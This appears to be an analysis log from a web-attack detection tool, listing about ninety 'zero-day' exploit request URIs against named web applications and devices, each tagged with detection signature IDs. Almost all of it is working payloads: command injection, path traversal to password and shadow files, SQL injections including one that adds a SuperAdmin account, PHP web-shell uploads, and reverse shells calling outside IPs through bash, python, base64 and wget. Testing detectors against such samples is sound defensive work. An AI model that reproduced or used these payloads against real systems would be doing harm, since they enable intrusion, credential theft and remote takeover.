# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: ms-inspectorlog -l tests/0days.uri -t list -r etc/basic_rules.conf
Packet [1]	Uri [/appliancews/getLicense?hostName=$(/usr/bin/wget%20http://1.1.1.1:12345/file%20-O%20/tmp/dsifnfnfdwsFFS)]	Nattacks [4 ]	Signatures	[932105]	[932130]	[932150]	[932160]
Packet [2]	Uri [/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../etc/passwd%00&Action=blast&hidenav=1]	Nattacks [9 ]	Signatures	[920270]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]
Packet [3]	Uri [/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../home/dna/spool/.pfile]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[930110]
Packet [4]	Uri [/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4=12&ping_IPAddr=12.12.12.12%3B+cat%20/etc/passwd]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [5]	Uri [/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4=12&ping_IPAddr=12.12.12.12%26+ls%20/etc/]	Nattacks [1 ]	Signatures	[932100]
Packet [7]	Uri [/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F1.1.1.1_pass_tshark.pcap%27--+-%22%3B%7D]	Nattacks [1 ]	Signatures	[942190]
Packet [9]	Uri [/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`]	Nattacks [2 ]	Signatures	[932105]	[932110]
Packet [10]	Uri [/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`]	Nattacks [1 ]	Signatures	[932100]
Packet [11]	Uri [/..//etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [12]	Uri [/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element=1%20AND%20SLEEP(5)]	Nattacks [1 ]	Signatures	[942160]
Packet [13]	Uri [/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserverMem&time_frame=1&element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)]	Nattacks [1 ]	Signatures	[942160]
Packet [14]	Uri [/wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.txt]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [15]	Uri [/search/members.json?id%60%3D-1%29%2f%2a%2a%2funion%2f%2a%2a%2fselect%2f%2a%2a%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cuser%28%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23balisong=1]	Nattacks [1 ]	Signatures	[942190]
Packet [16]	Uri [/fiyo/dapur/apps/app_article/controller/article_list.php?cat='%20orsleep(10)%20or%20'1&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1500268118960]	Nattacks [1 ]	Signatures	[942160]
Packet [20]	Uri [/DesktopModules/C_Info/WebService/C_InfoService.asmx?SOAPAction:%20"https://tempuri.org/GetArticleHitsArray"%20<?xml%20version="1.0"%20encoding="utf-8"?>%20<soap:Envelope%20xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance"%20xmlns:xsd="https://www.w3.org/2001/XMLSchema"%20xmlns:soap="https://schemas.xmlsoap.org/soap/envelope/">%20<soap:Body>%20<GetArticleHitsArray%20xmlns="https://tempuri.org/">%20<ArticleIDs>aaa’</ArticleIDs>%20</GetArticleHitsArray>%20</soap:Body>%20</soap:Envelope>]	Nattacks [2 ]	Signatures	[941100]	[941130]
Packet [21]	Uri [/api/saveconfig?key=__import__(%27os%27).system(%27touch%20%2Ftmp%2Fpy100%20%26%27)&value=10&_=1496061368064]	Nattacks [1 ]	Signatures	[933160]
Packet [23]	Uri [/wordpress/wp-admin/admin.php?page=SpiderCalendar&%20search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(2)))a)]	Nattacks [1 ]	Signatures	[942160]
Packet [24]	Uri [/wordpress/wp-admin/admin.php?page=SpiderCalendar&search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(30)))a)]	Nattacks [1 ]	Signatures	[942160]
Packet [26]	Uri [/esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS%20UNION%20ALL%20SELECT%201%20and%201=1&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML]	Nattacks [1 ]	Signatures	[942190]
Packet [27]	Uri [/KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD&&QUERY=1%20AND%20SLEEP(5)%20AND%20('foo'='foo'))%20&OUT=TAB]	Nattacks [1 ]	Signatures	[942160]
Packet [28]	Uri [/set_mail.cgi?next_url=mail.htm&loginuse=admin&loginpas=%s&sender=a@a.com&receiver1=;telnetd$IFS-p4444$IFS-l/bin/sh&receiver2=&receiver3=&receiver4=&ssl=0&svr=smtp.google.com&smtpport=25&user=&pwd=]	Nattacks [2 ]	Signatures	[920220]	[932160]
Packet [34]	Uri [/source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f'%2b(select*from(select(sleep(2)))a)%2b']	Nattacks [1 ]	Signatures	[942160]
Packet [36]	Uri [/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}]	Nattacks [2 ]	Signatures	[920270]	[933170]
Packet [37]	Uri [/actionphp/action.input.php?&ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1`%20WHERE%20SLEEP(5)--%20aaa%20&idForm=1234567890]	Nattacks [1 ]	Signatures	[942160]
Packet [38]	Uri [/actionphp/download.File.php?&file=../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]
Packet [39]	Uri [/subrion/actions.json?action=delete-file&item=members&itemid=1&field=emailor%20sleep(3)%20,username&file=123]	Nattacks [1 ]	Signatures	[942160]
Packet [40]	Uri [/fiyo/apps/app_article/controller/editor.php?id="%20and%20sleep(10)&art_title=123]	Nattacks [1 ]	Signatures	[942160]
Packet [41]	Uri [/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php?<?php%20echo(pi());]	Nattacks [1 ]	Signatures	[933100]
Packet [44]	Uri [/seos/1000/find.api?method=x%27%60id>/tmp/zz%60%27&oauth_token=b]	Nattacks [1 ]	Signatures	[932100]
Packet [46]	Uri [/hitehat-fta.accellion.net/courier/1000@/index.html?auth=oauth&auth_params=asdf%22%3E%20%3Cimg%20src%3Dx%20onerror%3Dalert(%27alert%60xss%60%27)%2F%2F%3E]	Nattacks [3 ]	Signatures	[941100]	[941120]	[941160]
Packet [47]	Uri [/courier/web/1000@/wmProgressval.html?server=file:///etc/passwd#https://localhost]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [51]	Uri [/pixie_v1.04/admin/index.php?s=publish&x=filemanager&-----------------------------8321182121675739546763935949%20Content-Disposition:%20form-data;%20name="upload[]";%20filename=tmp.txt%20Content-Type:%20image/jpeg%20<?php%20if(isset($_REQUEST['cmd'])){%20echo%20"<pre>";%20$cmd%20=($_REQUEST['cmd']);%20system($cmd);%20echo%20"</pre>";%20die;%20}%20?>%20-----------------------------8321182121675739546763935949%20Content-Disposition:%20form-data;%20name="file_tags"%20abcdef%20-----------------------------8321182121675739546763935949%20Content-Disposition:%20form-data;%20name="submit_upload"%20Upload%20-----------------------------8321182121675739546763935949%20Content-Disposition:%20form-data;%20name="MAX_FILE_SIZE"%20102400%20-----------------------------8321182121675739546763935949%20Content-Disposition:%20form-data;%20name="bb2_screener_"%201490835014%20192.168.1.6%20-----------------------------8321182121675739546763935949--]	Nattacks [5 ]	Signatures	[932100]	[932110]	[933100]	[933130]	[933160]
Packet [58]	Uri [/web/google_analytics.php?cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23]	Nattacks [2 ]	Signatures	[932100]	[932110]
Packet [61]	Uri [/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)]	Nattacks [1 ]	Signatures	[942160]
Packet [63]	Uri [/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=related%20module=news%20tag=1%20field=1%0aunion%0aselect%0auser()%23]	Nattacks [2 ]	Signatures	[932115]	[942190]
Packet [64]	Uri [/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=module%20form=1%20module=news%20field=1%0aunion%0aselect%0auser()%23]	Nattacks [2 ]	Signatures	[932115]	[942190]
Packet [65]	Uri [/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=form%20form=1%20field=1%0aunion%0aselect%0auser()%23]	Nattacks [2 ]	Signatures	[932115]	[942190]
Packet [66]	Uri [/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=member%20field=1%0aunion%0aselect%0auser()%23]	Nattacks [2 ]	Signatures	[932115]	[942190]
Packet [67]	Uri [/index.php?c=api&m=data2&auth={md5(SYS_KEY)}&param=action=related%20module=news%20tag=1,2%20catid=1,12))%0aand%0a0%0aunion%0aselect%0a*%0afrom(((((((((((((((((((select(user()))a)join(select(2))b)join(select(3))c)join(select(4))d)join(select(5))e)join(select(6))f)join(select(7))g)join(select(8))h)join(select(9))i)join(select(10))j)join(select(11))k)join(select(12))l)join(select(13))m)join(select(14))n)join(select(15))o)join(select(16))p)join(select(17))q)join(select(18))x)%23]	Nattacks [4 ]	Signatures	[932115]	[942190]	[942270]	[942360]
Packet [70]	Uri [/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=cache%20name=MEMBER.1'];phpinfo();$a=['1]	Nattacks [1 ]	Signatures	[933160]
Packet [72]	Uri [/fiyo/apps/app_comment/controller/insert.php?send=true&name=1"%20or%20sleep(10)%20or%20"1&email=aaa@qq.com&url=11&text=11111&captcha=undefined&link=%3Fapp%3Darticle%26view%3Ditem%26id%3D184]	Nattacks [1 ]	Signatures	[942160]
Packet [77]	Uri [/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E]	Nattacks [3 ]	Signatures	[941100]	[941110]	[941160]
Packet [79]	Uri [/websitebaker/account/preferences.php?action=details&display_name=24444'%20union%20select%20sleep(6)%23]	Nattacks [4 ]	Signatures	[942160]	[942170]	[942190]	[942360]
Packet [80]	Uri [/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE%20WHEN%20(1573=1573)%20THEN%201573%20ELSE%201573*(SELECT%201573%20FROM%20DUAL%20UNION%20SELECT%209674%20FROM%20DUAL)%20END)]	Nattacks [2 ]	Signatures	[942190]	[942270]
Packet [81]	Uri [/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT%206600%20FROM(SELECT%20COUNT(*),CONCAT(0x7171767071,(SELECT%20(ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)]	Nattacks [3 ]	Signatures	[942140]	[942190]	[942360]
Packet [82]	Uri [/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))GDiu)]	Nattacks [2 ]	Signatures	[942160]	[942360]
Packet [83]	Uri [/doli/theme/eldy/style.css.php?lang=de%27%20procedure%20analyse(extractvalue(rand()%2cconcat(concat(0x3a,CURRENT_USER())))%2c1)--%201]	Nattacks [2 ]	Signatures	[942190]	[942320]
Packet [84]	Uri [/theme/eldy/style.css.php?lang=de%27%3BINSERT%20INTO%20llx_user%20VALUES%20(424242%2C%200%2C%20NULL%2C%20NULL%2C%201%2C%200%2C%20%271984-01-01%2000%3A00%3A00%27%2C%20%271984-01-01%2000%3A00%3A00.000%27%2C%20NULL%2C%20NULL%2C%20%27newadmin%27%2C%20NULL%2C%20%2761529519452809720693702583126814%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%20%27SuperAdmin%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%201%2C%201%2C%201%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20NULL%2C%20%27%27%2C%20NULL%2C%201%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%200%2C%20%27%27%2C%200%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL)%3B--%27]	Nattacks [1 ]	Signatures	[942350]
Packet [85]	Uri [/doli/societe/list.php?sall=asd%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E]	Nattacks [3 ]	Signatures	[941100]	[941110]	[941160]
Packet [92]	Uri [/zm/index.php?view=request&request=log&task=query&limit=100;(SELECT%20*FROM%20(SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434]	Nattacks [3 ]	Signatures	[932115]	[942160]	[942360]
Packet [93]	Uri [/zm/index.php?view=request&request=log&task=download&key=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C/body%3E%3C/html%3Eayn2h]	Nattacks [4 ]	Signatures	[921130]	[941100]	[941110]	[941160]
Packet [94]	Uri [/zm/index.php/LSE4%22%3E%3Cscript%3Ealert(1)%3C/script%3ELSE]	Nattacks [1 ]	Signatures	[941110]
Packet [95]	Uri [/latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385);%20select%20*%20from%20users%20where%20(1=1]	Nattacks [2 ]	Signatures	[932115]	[942360]
Packet [96]	Uri [/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or-sleep(5)/*&customers_status=*/%23]	Nattacks [1 ]	Signatures	[942160]
Packet [97]	Uri [/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23]	Nattacks [2 ]	Signatures	[942160]	[942230]
Packet [98]	Uri [/index.php?controller=address&action=activate_address&id=1%20and%20if(1,sleep(1),0)%23]	Nattacks [1 ]	Signatures	[942160]
Packet [99]	Uri [/index.php?controller=blog&action=show&title=xx'%20union%20select1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23]	Nattacks [1 ]	Signatures	[942190]
Packet [100]	Uri [/index.php?controller=expComment&action=showComments&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s&config[disable_nested_comments]=1]	Nattacks [2 ]	Signatures	[942190]	[942360]
Packet [105]	Uri [/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm&modules=aa%27%20and%20%28select%20*%20from%20%28select%28if%28ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%3D114%2Csleep%282%29%2C0%29%29%29a%29%20or%20%27a%27%3D%27a]	Nattacks [2 ]	Signatures	[942160]	[942190]
Packet [106]	Uri [/GeniXCMS/register.php?activation=1'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(version(),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%23]	Nattacks [2 ]	Signatures	[942140]	[942190]
Packet [107]	Uri [/GeniXCMS/?author=user1&type=hi%27%20OR%20(SELECT%201431%20FROM(SELECT%20COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20bPMf]	Nattacks [2 ]	Signatures	[942140]	[942190]
Packet [108]	Uri [/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp?action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=&zipcode=&uemail=john.doe@test.com';WAITFOR%20DELAY%20'0:0:5'--&upphone=0&umobileno=]	Nattacks [3 ]	Signatures	[932115]	[942240]	[942280]
Packet [109]	Uri [/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E]	Nattacks [4 ]	Signatures	[941100]	[941120]	[941160]	[941180]
Packet [116]	Uri [/index.php?controller=pixidou&action=exitEditor&exitType=saveAsIs&fid=-1&apos;union%20select1,'./','evil.php',4,5,6,7,8,9,0,1,2,3,4,5%23&cpi=../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942190]
Packet [117]	Uri [/index.php?controller=pixidou&action=exitEditor&exitType=saveAsIs&fid=-1&apos;union%20select1,'./','1.txt',4,5,6,7,8,9,0,1,2,3,4,5%23&cpi=../../framework/conf/config.php]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942190]
Packet [118]	Uri [/takeconfirm.php?id=6&conusr[]=(select*from(select%20sleep(10))x)]	Nattacks [3 ]	Signatures	[942160]	[942170]	[942360]
Packet [119]	Uri [/modtask.php?action=confirmuser&userid=(select*from(select%20sleep(10))x)]	Nattacks [3 ]	Signatures	[942160]	[942170]	[942360]
Packet [120]	Uri [/massmail.php?class=666&or=<(select*from(select%20sleep(10))x)%23]	Nattacks [4 ]	Signatures	[932130]	[942160]	[942170]	[942360]
Packet [121]	Uri [/takeupdate.php?setdealt=1&delreport[]=0)union%20select%20(sleep(5))%23]	Nattacks [3 ]	Signatures	[942160]	[942190]	[942360]
Packet [122]	Uri [/takeupdate.php?delete=1&delreport[]=0)union%20select%20(sleep(1))%23]	Nattacks [3 ]	Signatures	[942160]	[942190]	[942360]
Packet [124]	Uri [/courier/themes/templates/.ooxxooxx.php?ooxxooxx=echo`$_POST[ccc]`;&ccc=ls-alh]	Nattacks [1 ]	Signatures	[933130]
Packet [125]	Uri [/courier/themes/templates/.ooxxooxx.php?ooxxooxx=echo`$_POST[ccc]`;&ccc=ls-alh/home/filex1/custom_template/1000/]	Nattacks [1 ]	Signatures	[933130]
Packet [126]	Uri [/courier/B3dKe9sQaa0L.log]	Nattacks [1 ]	Signatures	[920440]
Packet [127]	Uri [/UDDISecurityService/UDDISecurityImplBean?<SOAP-ENV:Envelope%20xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"%20xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"%20xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"%20xmlns:xsd="http://www.w3.org/2001/XMLSchema">%20<SOAP-ENV:Body>%20<m:deletePermissionById%20xmlns:m="http://sap.com/esi/uddi/ejb/security/">%20<permissionId>x'%20AND%201=(SELECT%20COUNT(*)%20FROM%20BC_UDV3_EL8EM_KEY)%20or%20'1'='1</permissionId>%20</m:deletePermissionById>%20</SOAP-ENV:Body>%20</SOAP-ENV:Envelope>]	Nattacks [2 ]	Signatures	[941100]	[941130]
Packet [128]	Uri [/ajax.cgi?action=tag_ipPing&pip=8.8.8.8%26echo%20test%20OS-Injection%26&cache=false&time=1498503087110]	Nattacks [2 ]	Signatures	[932100]	[932110]
Packet [129]	Uri [/simpleupload.py?$'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"'%0abash%20-i%20>%26%20/dev/tcp/8.8.8.8/443%200>%261%0aecho%20'&]	Nattacks [4 ]	Signatures	[932100]	[932110]	[932150]	[932160]
Packet [130]	Uri [/Embedded_Ace_Set_Task.cgi?$'5025=data;cat${IFS}/etc/shadow${IFS}>>/mnt/hda1/junxion/log/messages']	Nattacks [3 ]	Signatures	[930120]	[932130]	[932160]
Packet [132]	Uri [/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf%20'QNAPVJBD%08d%16s%20%2014`(echo;id)>&2`'%20$(expr%20$(date%20+%s)%20%%20100000000)%20Disconnect|base64|tr%20-d%20'rn')]	Nattacks [5 ]	Signatures	[920220]	[932100]	[932105]	[932110]	[932130]
Packet [133]	Uri [/cgi-bin/diagnostics?tsrEmailCurrent=true&currentTSREmailTo=|date>/tmp/xort||a%20%23]	Nattacks [1 ]	Signatures	[932110]
Packet [134]	Uri [/cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23]	Nattacks [1 ]	Signatures	[932110]
Packet [135]	Uri [/ping.cgi?DIA_IPADDRESS=8.8.8.8;cat%20/etc/passwd]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [136]	Uri [/phpmailer/contact_form.php?action=send&msg=Really%20important%20message&name=Jas%20Fasola&email="a"%20-be%20${run{${base64d:L2Jpbi9iYXNoIC1jICcwPCYxOTY7ZXhlYyAxOTY8Pi9kZXYvdGNwLzE3Mi4xNi43NC4xMjkvMTMzNztub2h1cCBzaCA8JjE5NiA+JjE5NiAyPiYxOTYgJic=}}}%20"@a.co]	Nattacks [1 ]	Signatures	[932130]
Packet [137]	Uri [/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3);%20system("/bin/bash%20-c%20'nohup%20bash%20-i%20>/dev/tcp/172.16.74.129/1337%200<&1%202>&1'%20");%20%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-Xupload/phpbackdoor3085.php%20"@email.com]	Nattacks [4 ]	Signatures	[932100]	[932160]	[933100]	[942160]
Packet [138]	Uri [/?------WebKitFormBoundaryzXJpHSq4mNy35tHe%20Content-Disposition:%20form-data;%20name="action"%20%20submit%20------WebKitFormBoundaryzXJpHSq4mNy35tHe%20Content-Disposition:%20form-data;%20name="message"%20%20Pwned%20------WebKitFormBoundaryzXJpHSq4mNy35tHe%20Content-Disposition:%20form-data;%20name="name"%20%20<?php%20system('python%20-c%20"""import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('8.8.8.8',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])"""');%20?>%20------WebKitFormBoundaryzXJpHSq4mNy35tHe%20Content-Disposition:%20form-data;%20name="email"%20%20"anarcoder"%20-OQueueDirectory=/tmp%20-X/www/backdoor.php%20server"%20@protonmail.com%20------WebKitFormBoundaryzXJpHSq4mNy35tHe--]	Nattacks [3 ]	Signatures	[932160]	[933100]	[933160]
Packet [140]	Uri [/phpmailer/contact_form.php?action=send&msg=<?php%20phpinfo();%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-X/var/www/html/uploads/phpcode.php%20%20some"@email.com]	Nattacks [2 ]	Signatures	[933100]	[933160]
Packet [141]	Uri [/phpmailer/contact_form.php?action=send&msg=Really%20important%20message&name=Jas%20Fasola&email="a"%20-be%20${run{${base64d:L2Jpbi9iYXNoIC1jICcwPCYxOTY7ZXhlYyAxOTY8Pi9kZXYvdGNwLzE3Mi4xNi43NC4xMjkvMTMzNztub2h1cCBzaCA8JjE5NiA+JjE5NiAyPiYxOTYgJic=}}}%20"@a.co]	Nattacks [1 ]	Signatures	[932130]
Packet [142]	Uri [/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3);%20system("/bin/bash%20-c%20'nohup%20bash%20-i%20>/dev/tcp/8.8.8.8/1337%200<&1%202>&1'%20");%20%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-Xupload/phpbackdoor3085.php%20"@email.com]	Nattacks [4 ]	Signatures	[932100]	[932160]	[933100]	[942160]
Packet [143]	Uri [/?------WebKitFormBoundaryzXJpHSq4mNy35tHernContent-Disposition:%20form-data;%20name="action"rnrnsubmitrn------WebKitFormBoundaryzXJpHSq4mNy35tHernContent-Disposition:%20form-data;%20name="name"rnrn<?php%20echo%20"|".base64_encode(system(base64_decode($_GET["cmd"])))."|";%20?>rn------WebKitFormBoundaryzXJpHSq4mNy35tHernContent-Disposition:%20form-data;%20name="email"rnrnvulnerables@%20-OQueueDirectory=/tmp%20-X/www/backdoor.phprn------WebKitFormBoundaryzXJpHSq4mNy35tHernContent-Disposition:%20form-data;%20name="message"rnrnPwnedrn------WebKitFormBoundaryzXJpHSq4mNy35tHe--rn]	Nattacks [5 ]	Signatures	[932100]	[933100]	[933130]	[933150]	[933160]
Packet [145]	Uri [/phpmailer/contact_form.php?action=send&msg=Really%20important%20message&name=Jas%20Fasola&email="a"%20-be%20${run{${base64d:L2Jpbi9iYXNoIC1jICcwPCYxOTY7ZXhlYyAxOTY8Pi9kZXYvdGNwLzE3Mi4xNi43NC4xMjkvMTMzNztub2h1cCBzaCA8JjE5NiA+JjE5NiAyPiYxOTYgJic=}}}%20"@a.co]	Nattacks [1 ]	Signatures	[932130]
Packet [146]	Uri [/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3);%20system("/bin/bash%20-c%20'nohup%20bash%20-i%20>/dev/tcp/172.16.74.129/1337%200<&1%202>&1'%20");%20%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-Xupload/phpbackdoor3085.php%20"@email.com]	Nattacks [4 ]	Signatures	[932100]	[932160]	[933100]	[942160]
Packet [149]	Uri [/es/index.php?option=com_virtuemart&view=categorysearch'%20RLIKE%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))sgjA)%20AND%20'jHwz'='jHwz&task=smartSearch]	Nattacks [1 ]	Signatures	[942160]
Packet [150]	Uri [/es/index.php?option=com_virtuemart&view=categorysearch%27+%2F+sleep%285%29+%2F+%27&task=smartSearch]	Nattacks [1 ]	Signatures	[942160]
Packet [151]	Uri [/typo3/index.php?id=8&no_cache=1?tx_news_pi1[overwriteDemand][order]=uid*(case((ord(substring((select(length(password)+9)from(be_users)where(uid=1))from(1)for(1))))=48)when(1)then(1)else(-1)end)&tx_news_pi1[overwriteDemand][OrderByAllowed]=uid*(case((ord(substring((select(length(password)+9)from(be_users)where(uid=1))from(1)for(1))))=48)when(1)then(1)else(-1)end)&tx_news_pi1[search][subject]=''&tx_news_pi1[search][minimumDate]=2016-01-01&tx_news_pi1[search][maximumDate]=2016-12-31]	Nattacks [1 ]	Signatures	[942230]
Packet [152]	Uri [/sources/item.query.php?type=action_on_quick_icon&id=(SELECT%20(CASE%20WHEN%20(6144=6144)%20THEN%206144%20ELSE%206144*(SELECT%206144%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))&action=1]	Nattacks [3 ]	Signatures	[942140]	[942190]	[942360]
